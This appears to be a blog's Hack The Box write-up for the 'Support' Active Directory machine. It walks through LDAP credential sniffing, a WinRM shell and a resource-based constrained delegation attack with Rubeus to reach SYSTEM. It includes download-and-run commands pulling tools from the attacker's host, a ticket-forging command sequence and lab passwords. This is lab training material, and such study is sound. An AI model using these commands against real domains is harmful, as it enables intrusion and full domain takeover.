mgarrity.com

Hack The Box - Support

January 22, 2023

SupportHTB

Support is a Windows machine running Active Directory. There's an open SMB share containing a .NET executable which authenticates using the LDAP protocol. Wireshark can be used to analyze the traffic of the LDAP queries to the Domain Controller to find credentials which can be used to enumerate LDAP. This leads to the discovery of the credentials for the support user which can then be used to get a shell with WinRM. Further analysis shows that the support user is a member of the Shared Support group which has GenericAll privileges on the DC, this can be leveraged to perform a resource-based constrained delegation attack to impersonate an administrator and obtain a shell as nt authority/system.

nmap scan:

scan with nmap

Most notable open ports:

  • 53 (DNS)
  • 88 (Kerberos)
  • 445 (SMB)
  • 389, 3268 (LDAP)
  • 636, 3269 (LDAPS)

Active Directory:

  • domain name: support.htb
  • hostname: DC

I went to /etc/hosts and added the IP 10.129.227.255 with support.htb and dc.support.htb

Since port 445 was open, I enumerated SMB shares with smbclient.

smbclient

Connecting to the support-tools share listed the following files:

smbclient support-tools

The most interesting was UserInfo.exe.zip, so I downloaded it locally.

get UserInfo.exe.zip

I extracted the archive into a directory called /UserInfo.

unzip UserInfo.exe.zip

file UserInfo.exe showed that it was a .NET executable built with Mono.

file UserInfo.exe

mono can be used to run .exe files on Linux. So, I ran mono UserInfo.exe to get usage info.

UserInfo.exe usage

mono UserInfo.exe -v find showed that either -first or -last was required.

UserInfo -v find

I ran mono UserInfo.exe -v find -first mike which outputted an object not found exception.

UserInfo no such object

Running the command again and intercepting the packets with Wireshark showed that they were connecting through LDAP.

making connection over ldap

Following the TCP stream of the LDAP bindRequest revealed authentication credentials.

follow tcp stream for password

domain: support

user: ldap

password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

I attempted to authenticate with crackmapexec as the ldap user to verify that these credentials were valid.

crackmapexec ldap authenticate

Next, I ran the bloodhound.py ingestor to gather the domain data.

bloodhound.py

Then, I imported the data into bloodhound to get a better idea of the AD environment.

Shortest Path to Unconstrained Delegation Systems showed SHARED SUPPORT ACCOUNTS@SUPPORT.HTB had GenericAll privileges on the DC and SUPPORT@SUPPORT.HTB could PSRemote into the DC which both stood out because these were custom configurations.

Find Shortest Path to Unconstrained Delegation Systems

I used ldapsearch to try and find some more information about the items in AD.

ldapsearch

Viewing the ldap.out file showed all the information about the items in the Active Directory. The support user (a member of the SHARED SUPPORT ACCOUNTS group) had an interesting info field with the value Ironside47pleasure40Watchful. Within Active Directory, passwords for shared accounts are sometimes stored as an attribute so this looked like it could be a password.

LDAP output support user

user: support

password: Ironside47pleasure40Watchful

I verified that these creds authenticate:

support user smb authentication

Along with finding out that the SUPPORT@SUPPORT.HTB could PSRemote into the DC, the BloodHound data also showed that SUPPORT@SUPPORT.HTB was a member of Remote Management Users, so I used Evil-WinRM to get a shell.

Remote Management Users

evil-winrm made a connection as the support user:

evil-winrm connection

The user flag can be found in C:\Users\support\Desktop

Next, I needed to escalate privileges to get administrator access.

Looking at the bloodhound data of group delegated object control, SUPPORT@SUPPORT.HTB (a member of SHARED SUPPORT ACCOUNTS@SUPPORT.HTB) had GenericAll on DC.SUPPORT.HTB which means that a trustee with this privilege can manipulate that computer object with full control.

Group Delegated Object Control

Looking at the abuse info of GenericAll showed the steps of the attack.

GenericAll Abuse Info

There were a few dependencies that I needed to download in order to run the attack and get a shell as domain administrator.

I copied the following paths into my /Desktop/HTB/Support/www directory:

cp /opt/Powermad/Powermad.ps1 .
cp /opt/PowerSploit/Recon/PowerView.ps1 .
cp /opt/SharpCollection/NetFramework_4.7_Any/Rubeus.exe .

Started a python server from the /Desktop/HTB/Support/www directory:

start python server

Next, I went into \programdata within the Evil-WinRM shell and downloaded Rubeus, Powermad, and PowerView with the following commands:

curl 10.10.14.14:8000/Rubeus.exe -o Rubeus.exe
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14:8000/Powermad.ps1')
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14:8000/PowerView.ps1')

evil-winrm programdata downloads

Checking back with the python server showed that the files downloaded successfully.

python server 200 response

Next, I checked the ms-ds-machineaccountquota attribute which showed that I could create a total of 10 machines, this is the default amount of computers that a user with standard AD rights can join to a domain.

Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

machineaccountquota

According to the GenericAll abuse info in BloodHound, the attack consists of the following steps:

Create a new machine account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

new account machine added

Get security identifier (SID) of new machine account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

get computer Sid

Create a Security Descriptor object and assign the new computer (attackersystem) SID.

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

security access control

Assign the newly created bytes to act on behalf of the DC by adding it to an ACL (Access Control List), which will allow the new computer to forge Kerberos tickets:

Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

set attacker machine to make authorized decisions on behalf of DC

Use Rubeus to hash a password for the attackersystem computer account.

.\Rubeus.exe hash /password:Summer2018!

hash password

Take the rc4_hmac form to run the s4u attack with Rubeus which will generate tickets for the administrator.

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

s4u attack

Copy the last ticket.

ticket

I removed any whitespace and saved it in a file called ticket.kirbi.b64.

Next, I ran the command base64 -d ticket.kirbi.b64 > ticket.kirbi to decode it from base64 and save it in a file called ticket.kirbi and then used ticketConverter.py from Impacket to convert the kirbi ticket to a ccache.

convert kirbi ticket to ccache

I used the ticket with psexec.py to get a shell as nt authority\system.

nt authority\system

The root flag can be found in C:\Users\Administrator\Desktop

root flag

CTF Writeups | InfoSec Topics

Written by Mike Garrity

Email RSS